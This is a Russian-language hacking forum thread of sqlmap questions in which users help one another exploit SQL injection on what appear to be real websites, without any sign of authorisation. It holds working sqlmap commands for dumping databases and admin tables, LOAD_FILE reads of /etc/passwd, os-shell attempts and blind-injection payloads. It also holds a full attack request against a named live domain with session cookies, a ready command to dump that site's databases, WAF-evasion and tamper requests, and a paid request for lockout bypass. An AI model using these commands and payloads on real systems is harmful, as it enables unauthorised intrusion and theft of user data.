Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Двумя сканерами проверил,не должна быть ложная
     
  2. kasper2020

    kasper2020 New Member

    Joined:
    30 Apr 2020
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Можно ли обойти WAF который блокирует все запросы POST, GET, в которых содержится "select*from", "update*set","delete*from" регистро-независимо?
    Не совсем понятно на каком уровне проходит WAF, но urlencode блокируется.

    back-end DBMS: MySQL >= 5.0.0
    banner: '5.7.26-log'
    server: Apache/2.2.15 (CentOS)
    x-powered-by: PHP/5.3.3
     
  3. LeninDie

    LeninDie Member

    Joined:
    26 Dec 2015
    Messages:
    60
    Likes Received:
    7
    Reputations:
    2
    столкнулся с ситуацией что приложение лочит аккаунт после 10 ошибок 500, скуля слепая и иначе данные никак не получить. поскольку лочится сам аккаунт то думаю что можно юзать куки от нескольких пользователей. на ум приходит только заменять куки при каждом запросе на новые и далее по кругу при каждом запросе (брать их из текстового файла) с определенным таймингом и подключить этот скрипт в качестве темпера. Подскажите это осуществимо? Мог бы кто нибудь помочь с реализацией за вознаграждение?)
     
  4. rozzet

    rozzet New Member

    Joined:
    29 Oct 2017
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    если акунетикс пишет SQL injection а не блинд, значит ложные исключены?
    Как часто акунетикс выдает ложные скули?
     
  5. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    369
    Likes Received:
    244
    Reputations:
    3
    Ну если он пишет что union query или error based, то да, если time based то может и ложное, где то процентов 15
     
  6. tester_new

    tester_new Elder - Старейшина

    Joined:
    12 Feb 2012
    Messages:
    287
    Likes Received:
    39
    Reputations:
    24
    Буду рад помощи, сливаю базу ниже указанным способом:
    Code:
    sqlmap -r my_http  --dump --threads=5 --dbms=mysql --dump -D some_db  --risk=3
    Скорость просто ужас(пробовал менять потоки, тайминги итд.. результата ноль) Как следствие Пробую слить данные только админов, указываю таблицу и запускаю:
    Code:
    sqlmap -r my_http  --dump --threads=5 --dbms=mysql --dump -D some_db  -T admin_table --risk=3
    
    [12:15:44] [WARNING] time-based comparison requires larger statistical model, please wait............................. (done) 
    do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
    [12:15:56] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
    [12:15:57] [INFO] adjusting time delay to 1 second due to good response times
    [12:15:58] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [12:15:58] [ERROR] unable to retrieve the number of columns for table 'admin_table' in database 'some_db'
    [12:15:58] [WARNING] unable to retrieve column names for table 'admin_table' in database 'some_db'
    [12:18:10] [WARNING] unable to enumerate the columns for table 'admin_table' in database 'some_db'
    [12:18:10] [INFO] fetched data logged to text files under '/root/.sqlmap/....'
    Получаю облом.... Пробую --sql-shell:
    Code:
    sql-shell> SELECT LOAD_FILE('/etc/passwd');
    [INFO] fetching SQL SELECT statement query output: 'SELECT LOAD_FILE('/etc/passwd')'
    [INFO] retrieved:
    
    sql-shell> desc mysql.user
    [INFO] fetching SQL query output: 'desc mysql.user'
    [INFO] retrieved:
    
    sql-shell> SELECT * FROM mysql.user;
    [INFO] fetching SQL SELECT statement query output: 'SELECT * FROM mysql.user'
    [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
    [INFO] fetching columns for table 'user' in database 'mysql'
    [INFO] retrieved:
    [ERROR] unable to retrieve the number of columns for table 'user' in database 'mysql'
    [INFO] retrieved:
    [WARNING] the SQL query provided does not return any output
    
    Снова облом а именно... в первых двух случаях получаю просто пустые строки, в третьем случае просто ошибка, пробую заюзать --os-shell:
    Code:
    [WARNING] unable to automatically retrieve the web server document root
    what do you want to use for writable directory?
    [1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default, /srv/www') (default)
    [2] custom location(s)
    [3] custom directory list file
    [4] brute force search
    
    Если лить в первый path-и(1) то получаю постоянно 404 (Not Found)
    пробовал сразу сбрутить(4) по предоставленному sqlmap-ом словарю... но все без результата.

    Главный вопрос: как так я могу получить дамп всей базы но не имею возможность указать конкретную таблицу?
    Пробовал имя таблицы указывать в ' ' подскажите что я упускаю...

    Решение:
    Напишу вдруг кому то поможет :) В моем случае проблема была в том что при запуске я 'соглашался' на редирект, после отказа от редиректа данные начали извлекаться нормально.
     
    #1046 tester_new, 10 May 2020
    Last edited: 11 May 2020
    vladF likes this.
  7. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Нужна помощь
    Сканер выдал такое:
    Code:
    This vulnerability affects /part_eYXfQU0lw9rhwob9qRP2GVMv.html.
    Discovered by: Scripting (Blind_Sql_Injection.script).
    Attack details
    URL encoded POST input partid was set to -1' OR 3*2*1=6 AND 000323=000323 or 'XAZghp6T'='
    
    Tests performed:
    -1' OR 2+323-323-1=0+0+0+1 or 'XAZghp6T'=' => TRUE
    -1' OR 3+323-323-1=0+0+0+1 or 'XAZghp6T'=' => FALSE
    -1' OR 3*2<(0+5+323-323) or 'XAZghp6T'=' => FALSE
    -1' OR 3*2>(0+5+323-323) or 'XAZghp6T'=' => FALSE
    -1' OR 2+1-1-1=1 AND 000323=000323 or 'XAZghp6T'=' => TRUE
    -1' OR 000323=000323 AND 3+1-1-1=1 or 'XAZghp6T'=' => FALSE
    -1' OR 3*2=5 AND 000323=000323 or 'XAZghp6T'=' => FALSE
    -1' OR 3*2=6 AND 000323=000323 or 'XAZghp6T'=' => TRUE
    -1' OR 3*2*0=6 AND 000323=000323 or 'XAZghp6T'=' => FALSE
    -1' OR 3*2*1=6 AND 000323=000323 or 'XAZghp6T'=' => TRUE
    Как правильно скормить в sqlmap?
     
  8. FireRidlle

    FireRidlle New Member

    Joined:
    7 Jul 2009
    Messages:
    25
    Likes Received:
    3
    Reputations:
    3
    как можно скормить sqlmap уязвимость в хедере?
     
  9. fandor9

    fandor9 Well-Known Member

    Joined:
    16 Nov 2018
    Messages:
    405
    Likes Received:
    597
    Reputations:
    19
    Вы можете полностью скопировать запрос в текстовый файл и в уязвимом параметре поставить знак * и потом уже стартовать скульмап:
    Code:
    sqlmap -r "zapros.txt"
    или же скопировать запрос и при старте указать тестируемый параметр/хедер (например User-Agent):
    Code:
    sqlmap -r "zapros.txt" -p "user-agent"
     
    FireRidlle likes this.
  10. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    237
    Likes Received:
    87
    Reputations:
    1
    Добрый подскажите как вытянуть пароль в blob?
    Пробовал и hex и прочее никак не тянет((
    Code:
    back-end DBMS: MySQL >= 5.0.0
    banner: '5.7.21-20-beget-5.7.21-20-1-log'
    Вечно такой результат
    http://joxi.ru/ZrJVX1phw8dRor
    http://joxi.ru/KAgK8yWFEDPj0A
     
  11. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    369
    Likes Received:
    244
    Reputations:
    3
    kacergei and fandor9 like this.
  12. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Приветствую! Проблема такая: при сливе обрезается хеш:
    Code:
    [04:41:49] [INFO] retrieved: 'test@mail.com','$2y$10$IN1YM1wQoCAAI...
    [04:41:51] [INFO] retrieved: 'test@mail.com','$2y$10$s7Y6jmxm0Lk5MYk6p727...
    [04:41:53] [INFO] retrieved: 'test@mail.net','$2y$10$zIlubVWzn/zVAbNef...
    [04:41:54] [INFO] retrieved: 'test@mail.com','$H\\2y$7KguiftaH$10\\ZByke...
    [04:41:56] [INFO] retrieved: 'test@mail.com','$2y$10$8ycUx4ZRAtEvOpHS...
    [04:41:58] [INFO] retrieved: 'test@mail.com','$2y$10$X2cd3HkmJs5f3DsUtzk...
    [04:42:00] [INFO] retrieved: 'test@mail.com','$2y$10$52HMKZS6r4HT...
    
    Как это побороть? Пробовал hex, no-cast
     
  13. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    369
    Likes Received:
    244
    Reputations:
    3
    С чё ты взял? Зайти в файл дампа и там посмотри, в консоле может и режет, потому что не влазит
     
    vladF likes this.
  14. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Спасибо,разобрался. Просто при сливе базы, данные сохраняются лишь в sqlite файл сессии. Если закрыть консоль, то дамп не сохраняется,нужно ждать пока он полностью не сольется. С помощью --stop 100, сдампил первые 100 строк и глянул, все хорошо)
     
  15. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    369
    Likes Received:
    244
    Reputations:
    3
    ctrl+c нажимаешь и дамп сохраняется
     
    vladF likes this.
  16. Axiles

    Axiles New Member

    Joined:
    14 Jan 2016
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Добрый день,подскажите пожалуйста как вставить вот такую пост ссылку в мап.Я так понимаю нужно прописать еще --data.спасибо
    http://prntscr.com/st216j
    Code:
    The vulnerability affects https://aachibilyaev.com/cabinet/registration/ , REGISTER[EMAIL]
    
    Discovered by SQL injection
    
    Attack Details
    arrow_drop_up
    POST (multipart) input REGISTER[EMAIL] was set to 1'"
    
    Error message found:
    You have an error in your SQL syntax
    Code:
    POST /cabinet/registration/?backurl=/cabinet/&register=yes HTTP/1.1
    Content-Type: multipart/form-data; boundary=----------Q9OXvYdJGy9b
    Referer: https://aachibilyaev.com/
    Cookie: PHPSESSID=ivp6k01981u5ild8o166grp2r0;BITRIX_SM_GUEST_ID=139605;BITRIX_SM_LAST_VISIT=03.06.2020+14%3A00%3A45;io=NVTaYGNo3vUnQsF_AAiQ;tmr_reqNum=26;BITRIX_CONVERSION_CONTEXT_s1=%7B%22ID%22%3A1%2C%22EXPIRE%22%3A1591217940%2C%22UNIQUE%22%3A%5B%22conversion_visit_day%22%5D%7D;catalogViewMode=list;_ym_debug=null;last_visit=1591170065298::1591180865298;top100_id=t1.6912325.390564327.1591180865288
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate
    Content-Length: 1021
    Host: aachibilyaev.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive
    
    ------------Q9OXvYdJGy9b
    Content-Disposition: form-data; name="REGISTER[CONFIRM_PASSWORD]"
    
    g00dPa$$w0rD
    ------------Q9OXvYdJGy9b
    Content-Disposition: form-data; name="REGISTER[EMAIL]"
    
    1'"
    ------------Q9OXvYdJGy9b
    Content-Disposition: form-data; name="REGISTER[LOGIN]"
    
    1
    ------------Q9OXvYdJGy9b
    Content-Disposition: form-data; name="REGISTER[NAME]"
    
    TWSfSopc
    ------------Q9OXvYdJGy9b
    Content-Disposition: form-data; name="REGISTER[PASSWORD]"
    
    g00dPa$$w0rD
    ------------Q9OXvYdJGy9b
    Content-Disposition: form-data; name="REGISTER[PERSONAL_PHONE]"
    
    555-666-0606
    ------------Q9OXvYdJGy9b
    Content-Disposition: form-data; name="backurl"
    
    /cabinet/
    ------------Q9OXvYdJGy9b
    Content-Disposition: form-data; name="licenses_popup"
    
    Y
    ------------Q9OXvYdJGy9b
    Content-Disposition: form-data; name="register_submit_button"
    
    reg
    ------------Q9OXvYdJGy9b
    Content-Disposition: form-data; name="register_submit_button1"
    
    register_submit_button1=Регистрация
    ------------Q9OXvYdJGy9b--
     
  17. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    369
    Likes Received:
    244
    Reputations:
    3
    sqlmap.py --url "https://aachibilyaev.com/cabinet/registration/?register=yes" --data="backurl=/cabinet/login/&registe
    r_submit_button=reg&REGISTER[NAME]=asdasd&REGISTER=1*&REGISTER[PERSONAL_PHONE]=+7 (123) 123-12-31&REGISTER[PASSWORD]=1234567&REGISTER[CONFIRM_PASSWORD]=1234567&REGI
    STER[LOGIN]=1&licenses_popup=Y&register_submit_button1=Регистрация" --dbs --risk=3 --level=3 --dbms=mysql

    p.s там фильтрация
     
    Axiles likes this.
  18. Axiles

    Axiles New Member

    Joined:
    14 Jan 2016
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    это через burp? спасибо
     
  19. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    369
    Likes Received:
    244
    Reputations:
    3
    это так в мапу уже пихать
     
  20. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    369
    Likes Received:
    244
    Reputations:
    3
    Помогите с тампером для мапы, нужно что б слово from меняло на 'xz'froM
     
Loading...